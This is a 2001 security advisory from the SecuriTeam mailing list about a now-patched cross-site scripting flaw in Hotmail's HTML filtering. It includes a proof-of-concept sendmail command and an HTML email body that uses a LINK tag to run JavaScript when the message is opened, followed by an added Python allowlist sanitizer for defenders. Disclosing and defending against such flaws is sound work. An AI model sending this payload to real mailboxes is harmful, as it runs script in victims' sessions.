[NEWS] Hotmail LINK CSS Vulnerability (New Strain)

From: support@securiteam.com
Date: 08/26/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Hotmail LINK CSS Vulnerability (New Strain)
Message-Id: <20010826061009.5D53D138BF@mail.der-keiler.de>
Date: Sun, 26 Aug 2001 08:10:09 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Hotmail LINK CSS Vulnerability (New Strain)
------------------------------------------------------------------------

SUMMARY

A new Cross Site Scripting (CSS) vulnerability carries with it
potentially serious security implications that go beyond the Microsoft
Hotmail system. This vulnerability, and CSS vulnerabilities of this type,
affect many more HTML aware web applications.

The below Cross Site Scripting vulnerability is believed to be a new
strain of CSS. Web application developers and security engineers are urged
to check and update their current HTML filters in all HTML aware web
applications. This includes Webmail, On-line Auctions, Message Boards,
HTML Chats, Guest Books, etc.

NOTE: Microsoft was advised of this issue Aug 21, 2001 and issued a fix by
Aug 23, 2001. Hotmail is no longer vulnerable to this problem.

DETAILS

This is a simple proof of concept that illustrates how sending a crafted
HTML email with the enclosed body will auto-execute JavaScript when the
email is read.

** NOTE: Example tested under Netscape 4.77 **

==============================================

* WebMail Example *
sendmail -t <target>@hotmail.com

MIME-Version: 1.0
From: The Attacker <foos@bar.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: LINK TAG JavaScript Execution Example

<HTML><BODY>

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

</BODY></HTML>

========================================
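
A defender-side check for the filter update urged in the summary, as an added example (not part of the original advisory and not Hotmail's code): a filter that strips only <script> elements passes the LINK body above unchanged, while an allowlist sanitizer drops it. The tag allowlist, the scheme list and all function names are assumptions chosen for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample: the HTML body shown in the advisory.
ADVISORY_BODY = ('<HTML><BODY>\n<LINK REL=STYLESHEET TYPE="text/javascript" '
                 'SRC="javascript_path.js">\n</BODY></HTML>')

def blocklist_filter(html):
    """Weak filter for comparison: strips only <script> elements."""
    return re.sub(r'(?is)<script\b.*?</script\s*>', '', html)

# Assumed allowlist for a mail renderer: tag -> permitted attributes.
ALLOWED = {'b': set(), 'i': set(), 'p': set(), 'br': set(), 'a': {'href'}}
SAFE_SCHEMES = ('http://', 'https://', 'mailto:')

class AllowlistSanitizer(HTMLParser):
    # Re-emits only allowlisted tags and attributes; everything else is dropped.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self.skip = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append(tag)          # LINK, HTML, BODY, SCRIPT, ...
            self.skip = self.skip or tag in ('script', 'style')
            return
        kept = []
        for name, value in attrs:
            value = value or ''
            if name not in ALLOWED[tag]:
                continue                      # event handlers, style, src, ...
            if name == 'href' and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue                      # javascript: and other unlisted schemes
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f'<{tag}{"".join(kept)}>')

    def handle_endtag(self, tag):
        if tag in ('script', 'style'):
            self.skip = False
        elif tag in ALLOWED and tag != 'br':
            self.out.append(f'</{tag}>')

    def handle_data(self, data):
        if not self.skip:                     # do not echo script/style source as text
            self.out.append(escape(data, quote=False))

def sanitize(html):
    """Return (clean_html, dropped_tags) for an untrusted HTML mail body."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return ''.join(parser.out), parser.dropped
```

Running both filters over a corpus of stored messages and comparing the `dropped_tags` output is a quick way to see which elements an existing blocklist lets through.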
